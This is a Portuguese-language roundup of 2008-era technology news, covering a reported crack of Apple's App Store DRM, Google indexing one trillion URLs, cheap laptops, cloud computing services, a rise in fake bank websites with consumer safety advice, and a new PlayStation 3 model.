Hackers quebram DRM de aplicativos para iPhone vendidos na App Store

Hackers anunciaram nesta segunda-feira (28/07) a quebra do DRM Fairplay integrado pela Apple nos aplicativos vendidos na App Store para evitar a distribuição gratuita.

O hack, publicado no blog Haklabs, permite que o game “Super Monkey Ball”, da Sega, seja instalado em iPhones e iPods touch sem os 9,99 dólares pedidos pelo título dentro da App Store, o que abre precedente perigoso para lucratividade da App Store da Apple.

O anúncio esclarece que usuários interessados precisam ter o firmware 2.0 no aparelho e gerenciamento de arquivos pelo SSH, para que o game seja copiado no disco do iPhone por um desktop.

O DRM usado pela Apple nos aplicativos para iPhone e iPod touch vendidos no App Store é o mesmo usado há anos para canções, filmes e episódios de seriados oferecidos no iTunes Music Store.

Fonte: IDG Now!

Google contabiliza mais de 1 trilhão de URLs únicas na internet mundial

O Google anunciou recentemente que registrou mais de um trilhão de URLs únicas na internet, marco que surpreendeu até mesmo os engenheiros do buscador, segundo post no blog oficial da companhia.

Além de anunciar a descoberta, o Google aproveitou para promover o escopo e magnitude de seu índex.

“Não queremos indexar cada um destes trilhões de páginas - muitos são similares aos outros ou representam conteúdo gerado automaticamente, o que não é muito útil para usuários que buscam.

Mas estamos orgulhosos de ter o índex mais compreensivo entre todos os buscadores, e nosso objetivo sempre foi indexar todos os dados do mundo”, escreveram Jesse Alpert e Nissan Hajaj, engenheiros de software no time de infraestrutura de busca do Google.

Ironicamente, a divulgação do marco acontece dias antes do Google ganhar um novo rival, chamado de Cuil e criado por uma ex-funcionária, ser lançado oficialmente, oferecendo resultados reproduzidos de maneira diferente da do Google.

A controvérsia que sempre cercou a divulgação de números sobre o índex de buscadores foi amenizada com a conclusão que raramente usuários visitam mais que duas páginas de resultados online. Em outras palavras, o que importante é entregar os 10 resultados mais relevantes ao invés de 5 mil links que o usuário precisará separar.

O buscador também divulgou informações sobre como e com qual freqüência analiza seus links.

“Atualmente, o Google analisa a internet constantemente, coletando páginas e informações atualizadas e reprocessando um gráfico de links muitas vezes por dia. Este gráfico de um trilhão de URLs é similar a um mapa feito totalmente com 1 trilhão de interseções. Muitas vezes por dia, fazemos equivalente computacionais para explorar totalmente cada interseção de cada estrada nos Estados Unidos. Com o problema que se trata de um mapa 50 mil vezes maior que o dos EUA, com 50 mil vezes mais estradas e cruzamentos”, afirma o post.

Fonte: IDG Now!

Consumidor terá de esperar 3 anos por laptop de 100 dólares, diz Gartner

No mesmo dia em que a indústria anuncia um notebook de 130 dólares, a consultoria Gartner divulga um estudo afirmando que o consumidor ainda terá de esperar três anos para comprar um laptop de 100 dólares.

No estudo divulgado nesta segunda-feira (28/07) a Gartner faz um alerta: se os fornecedores se concentrarem demais em atingir a marca dos 100 dólares, perderão foco em questões técnicas essenciais para os portáteis.

Na opinião de Annette Jump, analista da consultoria, a corrida pelo laptop de 100 dólares em mercados emergentes deixa alguns problemas em aberto. “Entre eles, determinar a relevância das especificações de hardware, a oferta de energia elétrica, a estrutura e o custo das conexões à internet, bem como condições adequadas de financiamento e pagamento nos mercados emergentes.”

Enquanto a Gartner divulgava sua análise, a fabricante taiwanesa Carapelli Ltd. anunciava o Impulse NPX-9000, um laptop de 130 dólares, considerado o “laptop mais barato do mundo”. A pegadinha é que as máquinas são vendidas somente em lotes de 100 unidades.

Antes do anúncio da Carapelli, o portátil mais acessível do mercado era o laptop XO, criado pela organização One Laptop Per Child’s (OLPC), e vendido por tempo limitado, a 188 dólares, no ano passado.

Embora tenha sido a máquina mais barata até então, o XO ainda apresentava deficiências em hardware, como limitações de processamento e funções gráficas.

A analista da Gartner nota, em seu relatório, que a crescente demanda por laptops mais baratos aliada à queda nos preços de componentes, poderia reduzir os preços dos portáteis entre 10% e 15% nos próximos três anos. Jump lembra que os custos de montagem, empacotamento e software devem ser os mesmos, neste período.

No vácuo dos laptops voltados ao segmento educacional, os mini laptops, ou ultraportáteis, vem conquistando os usuários residenciais.

Jump ressalta que o caminho dos ultraportáteis é oferecer uma opção de acesso a novos usuários de internet. “Os mini notebooks alcançarão muitos consumidores em todas as regiões, tanto em mercados mais maduros, como máquinas adicionais, como em mercados emergentes fazendo o papel dos PCs”, conclui.

Fonte: IDG Now!

Cloud computing: a web vira extensão do seu HD

Uma nova tendência tem sido apontada por muitos especialistas como a próxima revolução na informática. O conceito de cloud computing (ou “nuvem computacional”) refere-se a uma troca de infra-estrutura física por uma infra-estrutura virtual.

A idéia é de um espaço virtual - a Internet - que contém todos os dados, arquivos e programas que hoje armazenamos em nossos computadores, tornando-os acessíveis de qualquer lugar por meio da web. Um exemplo já bem conhecido é o webmail - você só precisa se conectar, de qualquer computador, e lá está seu correio virtual.

“Cloud computing é o futuro”, afirma Marco Américo D. Antonio, vice-presidente na área de data center da Diveo do Brasil. No País, a migração para este modelo tem sido bastante rápida e deve se estabelecer em um ou dois anos, acredita Antonio. A virtualização de recursos, acrescenta, deve também baixar os custos para o consumidor.

Apostas no futuro

O cloud computing tem sido visto como um problema para a Microsoft, que ainda produz uma maioria de softwares tradicionais.

Segundo sua assessoria, a empresa trabalha com o modelo baseado na web há cerca de 10 anos, mas não se prende a ele, pois busca juntar o melhor dos dois tipos - cloud ou tradicional. “Não acreditamos que o software estará somente na cloud ou no hardware - trata-se de uma combinação”, afirmou a assessoria da empresa no Brasil.

Para a Microsoft, a próxima evolução nos serviços corporativos será aquela que permita englobar os dois mundos. Já Antonio tem uma previsão um pouco mais enfática do futuro dominado pelo cloud computing: “O mundo será ainda mais dependente da tecnologia”.

Aplicativos nas nuvens

Muitas empresas estão investindo na tendência, com maior ou menor intensidade, e o número de aplicativos baseados na web é cada vez maior.

O Google oferece o serviço Google Apps, um conjunto de aplicativos online com funções similares às tradicionalmente encontradas em pacotes “Office”, como Gmail (webmail), Google Docs (gerenciador de documentos e planilhas) e Page Creator (que permite criar páginas da web). A ferramenta Google Apps possui três versões disponíveis, gratuitas ou não.

Planilhas eletrônicas são a especialidade do NumSum (em inglês), serviço gratuito que permite criar planilhas e também compartilhá-las.

Também gratuito, o Thumbstacks (em inglês) permite que o internauta crie apresentações, como slideshows, em uma interface bastante parecida à do PowerPoint. Depois, é possível enviá-la para amigos ou publicá-la na web.

A Adobe disponibiliza na web o Photoshop Express (em inglês), versão online e simplificada do software de edição imagens. É possível cortar, mudar as cores e usar várias ferramentas de edição em suas fotografias. O site ainda oferece 2 GB para armazenamento de fotos e uma galeria para exibi-las na web.

Outra opção para editar fotos online é o Snipshot (em inglês), que permite cortar, ajustar contraste, saturação, desfazer e refazer, etc. Imagens “pesadas” não são problema: é possível trabalhar com fotos de até 10 MB.

O MyPictr (em inglês) também é um serviço de edição de fotos, mas é bem mais específico. O aplicativo é destinado exclusivamente a cortar fotos nos tamanhos usados por diferentes redes sociais e outros sites, como MySpace, Facebook, Skype, Blogger, YouTube e Flickr.

O WobZip (em inglês) é um aplicativo para descompactar arquivos online. Ele aceita diversos formatos, como RAR e ZIP, em arquivos de até 100 MB. Além disso, ainda examina os arquivos com antivírus.

O Terra oferece um serviço gratuito de armazenamento na web, disponível a clientes de qualquer provedor. O Disco Virtual (em português) oferece um espaço de até 100 MB para guardar arquivos em uma conta pessoal e acessá-los de qualquer lugar do mundo, além de poder compartilhar com quem quiser.

Outra opção de armazenamento virtual é o Box (em inglês). Os preços variam de acordo com a capacidade de armazenamento, mas o site oferece uma avaliação gratuita de 14 dias.

Ainda em versão beta, o Microsoft Office Live permite acessar e editar documentos em programas como Word, Excel, Outlook e PowerPoint. Por enquanto, a versão de teste do serviço está disponível para testes apenas na Alemanha, França, Japão, Inglaterra e Estados Unidos.

Fonte: Terra

Número de sites falsos de bancos cresceu 85% nos últimos três meses

De acordo com o Cert, um comitê que monitora fraudes pela internet, o número de páginas falsas de bancos cresceu 85% nos últimos três meses em comparação com o mesmo período do ano passado.

A aposentada Adelaide de Castro foi vítima de um golpe. Seu saldo, de repente, ficou negativo. O dinheiro foi transferido para outra conta, usado em um empréstimo e para pagar faturas. Tudo sem a autorização dela. Quase R$ 40 mil de prejuízo. “A suspeita é de assalto virtual. As armadilhas estão na tela do computador. Basta um clique em falso”, diz a aposentada.

Os golpistas fazem de tudo para enganar internautas. Até induzir o cliente a acessar páginas clonadas de bancos. Parece um ambiente seguro, mas tudo que é digitado, como códigos de segurança e informações pessoais, vai parar nas mãos dos ladrões de senha.

Para evitar cair em golpes virtuais, a Federação Brasileira de Bancos (Febraban) alerta aos internautas que evitem abrir e-mail de desconhecidos (principalmente com conteúdo pornográfico), digitem sempre o endereço da página no navegador, não abram mensagens do tipo “clique aqui”, não digitem informações sigilosas em computadores usados por muitas pessoas, como os de lan houses e cyber cafés, e troquem sempre a senha da internet.

A segurança do cliente é responsabilidade da instituição financeira. Se ficar comprovado que houve falha, a vítima tem que receber o dinheiro de volta. Foi o que aconteceu com a professora Letícia Tunholi. “Tive que fazer ocorrência na delegacia, o banco teve que apurar a fraude. Demorou um pouquinho, mas eu fui ressarcida e aprendi a lição”, garante.

Fonte: G1

Novo Playstation 3 é aprovado nos EUA

Um novo console Playstation 3 foi aprovado pela Comissão de Comunicações dos Estados Unidos, a FCC, na semana passada, segundo o banco de dados da agência.

Não há informações sobre o novo modelo, identificado apenas pelo número CECHL01, porque a Sony pediu um prazo de confidencialidade, mas provavelmente se trata da versão de 80GB anunciada neste mês durante a conferência de games E3 em Los Ageles.

O console deve começar a ser vendido em dois meses e substituirá o atual modelo de 40GB.

A FCC é a instituição que regula a transmissão de ondas de rádio nos Estados Unidos, e, portanto, tem que aprovar todos os novos produtos que usam rádio. O Playstation 3 oferece conexões Wi-Fi 802.11 b/g e Bluetooth.

Fonte: IDG Now!